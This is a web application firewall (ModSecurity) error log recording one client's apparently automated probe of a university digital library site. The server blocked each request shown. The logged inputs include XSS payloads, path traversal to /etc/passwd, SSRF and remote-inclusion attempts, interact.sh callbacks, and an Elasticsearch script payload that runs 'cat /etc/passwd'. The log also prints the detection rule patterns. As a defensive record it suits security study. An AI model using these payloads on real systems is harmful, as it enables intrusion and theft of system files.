[Tue Aug 29 11:56:34.554519 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAArHa38AAAAJ"]
[Tue Aug 29 11:56:36.551543 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq3a-8AAAAI"]
[Tue Aug 29 11:56:36.680202 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAArB128AAAAV"]
[Tue Aug 29 11:56:37.535453 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAArHa4sAAAAJ"]
[Tue Aug 29 11:56:39.666871 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAq-HdYAAAAT"]
[Tue Aug 29 11:56:39.705108 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53AAAAAH"]
[Tue Aug 29 11:56:39.899043 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAAq-HeEAAAAT"]
[Tue Aug 29 11:56:40.542963 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocylkAAAAR"]
[Tue Aug 29 11:56:40.813190 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq5@TQAAAAK"]
[Tue Aug 29 11:56:42.676755 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAocymYAAAAR"]
[Tue Aug 29 11:56:43.527522 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAoz8NcAAAAS"]
[Tue Aug 29 11:56:43.614165 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArHa54AAAAJ"]
[Tue Aug 29 11:56:44.596271 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArB14wAAAAV"]
[Tue Aug 29 11:56:45.685110 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:791590/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAocynwAAAAR"]
[Tue Aug 29 11:56:46.712080 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:630150/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArZP08AAAAC"]
[Tue Aug 29 11:56:46.730827 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArZP1AAAAAC"]
[Tue Aug 29 11:56:47.627339 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAq5@WEAAAAK"]
[Tue Aug 29 11:56:47.663345 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAq-HgYAAAAT"]
[Tue Aug 29 11:56:48.668870 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAolK7IAAAAe"]
[Tue Aug 29 11:56:48.719916 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAaIAAAAX"]
[Tue Aug 29 11:56:50.630855 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAoz8PMAAAAS"]
[Tue Aug 29 11:56:51.680862 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "digilibft.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAqqtmQAAAAA"]
[Tue Aug 29 11:56:52.710676 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAoz8QIAAAAS"]
[Tue Aug 29 11:56:52.751053 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QQAAAAS"]
[Tue Aug 29 11:56:54.663123 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAqqtoEAAAAA"]
[Tue Aug 29 11:56:56.119266 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8SEAAAAS"]
[Tue Aug 29 11:56:57.680513 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8TgAAAAS"]
[Tue Aug 29 11:56:59.686805 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAArbWQMAAAAG"]
[Tue Aug 29 11:57:01.041684 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAArbWREAAAAG"]
